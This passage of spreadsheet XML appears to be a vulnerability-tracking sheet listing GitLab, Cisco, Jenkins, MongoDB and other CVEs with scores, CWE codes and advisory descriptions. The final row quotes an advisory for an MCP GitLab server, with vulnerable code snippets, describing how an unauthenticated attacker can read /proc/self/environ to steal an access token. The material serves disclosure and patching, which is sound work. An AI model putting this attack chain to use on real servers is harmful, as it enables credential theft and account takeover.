      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 18.11 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an authenticated user with the Security Manager role to execute arbitrary CI/CD jobs and access protected variables within group projects due to improper authorization controls on compliance framework management.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16794</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20285</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to modify parts of the configuration on an affected device.
This vulnerability is due to the lack of server-side validation of&amp;nbsp;Administrator&amp;nbsp;permissions. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to modify descriptions of files on a specific page. To exploit this vulnerability, an attacker would need valid&amp;nbsp;Administrator credentials.</t>
        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20285</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20286</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Identify Services Engine (ISE) could allow an authenticated, remote attacker to modify parts of the configuration on an affected device.
This vulnerability is due to the lack of server-side validation of&amp;nbsp;Administrator&amp;nbsp;permissions. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to modify descriptions of files on a specific page. To exploit this vulnerability, an attacker would need valid&amp;nbsp;Administrator credentials.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20286</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54247</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>Skipper is an HTTP router and reverse proxy for service composition. Prior to 0.26.22, Handler in dataclients/kubernetes/admission/admission.go passes the body of requests to the Kubernetes admission endpoint at :9443/admission directly to io.ReadAll(r.Body) without a size limit. An attacker with in-cluster network access and a valid Kubernetes client certificate can send a very large body that causes unbounded memory allocation and an out-of-memory termination of the Skipper process. The disruption is limited to Ingress and RouteGroup admission rather than pod creation or unrelated admission controllers, and Kubernetes normally restarts the process. This issue is fixed in version 0.26.22.</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54247</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73019</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K287"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287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7514</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.9 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that an authenticated user with developer-role permissions could substitute package file content and hide packages from their owners due to improper authorization checks in the Generic Package Registry.</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7514</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8030</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an authenticated user to prevent another user from modifying their group settings due to improper validation of group URL slugs during namespace transfers.</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8030</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92141</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>jenkins, keycloak</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>Jenkins Keycloak Authentication Plugin 2.4.1 and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92141</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92131</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>Jenkins Pipeline: Groovy Libraries Plugin 805.va_fc79344957d and earlier does not restrict the library path provided to the library Pipeline step to a relative path inside the SCM checkout, and follows symbolic links to locations outside of the SCM checkout when retrieving the library, resulting in a path traversal vulnerability, allowing attackers able to configure Pipelines to read files in a resources directory and to delete files in a test directory on the Jenkins controller file system.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92131</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92138</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>The OAuth authorization endpoint in Jenkins Bitbucket Server Integration Plugin 6.0.1 and earlier reads the `oauth_callback` URL from the submitted form rather than from the server-side stored request token, allowing attackers to hijack the OAuth flow and obtain an access token on behalf of the victim.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92138</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20071</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>3.8</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the SSID bring-your-own-device (BYOD) onboarding workflow of Cisco ISE could allow an unauthenticated, adjacent attacker to hijack the onboarding session of&amp;nbsp;another user and access protected 802.1X networks. &amp;nbsp;
This vulnerability is due to insufficient authentication checks that are performed while a user is being onboarded. An attacker could exploit this vulnerability by spoofing the legitimate user and triggering&amp;nbsp;a redirection to the guest web portal. A successful exploit could allow the attacker to take over the user session and gain access to the protected 802.1X network.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20071</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3855</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-99</t>
        </is>
      </c>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2.7 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an authenticated user with project-level permissions to access restricted file contents on the server or cause denial of service due to improper validation of parameters in the Terraform state upload functionality.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3855</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92130</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>Jenkins Pipeline: Multibranch Plugin 841.vec5b_9e1806ec and earlier does not set the appropriate context for credentials lookup in the resolveScm Pipeline step, allowing attackers with Item/Configure permission to access and capture credentials they are not entitled to.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92130</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82060</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>In MongoDB, insufficient validation of shard key values during document insertion allowed authenticated users to store documents with specially crafted, operator-shaped objects as shard key values in sharded collections. When change stream events for such documents were processed with the updateLookup full document mode, the crafted values were embedded into internal post-image lookup queries without proper sanitization, causing them to be interpreted as query operators rather than literal equality values. This could result in change stream consumers receiving incorrect post-image documents or encountering non-resumable fatal errors.</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90598</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in jaygajera17 E-commerce-project-springBoot up to 5e74a46b4b70623d0e4a0c9c4aee3bd1777185d2. The impacted element is the function UserController.updateUser of the file UserController.java. Performing a manipulation of the argument userid results in authorization bypass. It is possible to initiate the attack remotely. The exploit is now public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90598</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61560</t>
        </is>
      </c>
      <c r="D298" s="5" t="inlineStr"/>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr">
        <is>
          <t>npm:@zereight/mcp-gitlab</t>
        </is>
      </c>
      <c r="M298" s="5" t="inlineStr">
        <is>
          <t>2.1.27</t>
        </is>
      </c>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr"/>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>### Summary
The SSE transport mode (`SSE=true`) exposes all MCP tools without any authentication. The `upload_markdown` tool reads arbitrary files from the server's local filesystem via an unsanitized `file_path` parameter and uploads them to a GitLab project. Combined, any unauthenticated network-reachable attacker can read `/proc/self/environ` to steal the server's `GITLAB_PERSONAL_ACCESS_TOKEN` and achieve full GitLab account takeover. This is the default configuration for Docker deployments.
### Details
Two issues chain together:
**1. No authentication on SSE transport (`src/index.ts:7350-7388`)**
When `SSE=true` (the intended mode for Docker deployments per `docker-compose.yaml`), the `/sse` and `/messages` endpoints have zero authentication middleware. Any HTTP client that can reach the port can establish a session and invoke all ~100+ tools using the server's configured PAT.
```typescript
// src/index.ts:7354 — no auth check
app.get("/sse", async (_: Request, res: Response) =&gt; {
    const serverInstance = createServer();
    const transport = new SSEServerTransport("/messages", res);
    await serverInstance.connect(transport);
});
```
Remote Authorization (`REMOTE_AUTHORIZATION=true`) is explicitly incompatible with SSE mode (`src/index.ts:1833-1839`), so there is no way to add per-request auth in this transport.
**2. Arbitrary file read in `upload_markdown` (`src/index.ts:5461-5503`)**
The `upload_markdown` tool calls `fs.readFileSync(filePath)` where `filePath` comes directly from user input with no validation. The Zod schema (`src/schemas.ts:2150-2153`) defines `file_path` as `z.string()` with no path restrictions, allowlists, or sandboxing.
```typescript
async function markdownUpload(projectId: string, filePath: string) {
    if (!fs.existsSync(filePath)) {
        throw new Error(`File not found: ${filePath}`);
    }
    const fileBuffer = fs.readFileSync(filePath);  // Arbitrary file read — no path validation
    // ... uploads to GitLab project via POST /projects/:id/uploads
}
```
This tool is in the `users` toolset, which is **enabled by default**.
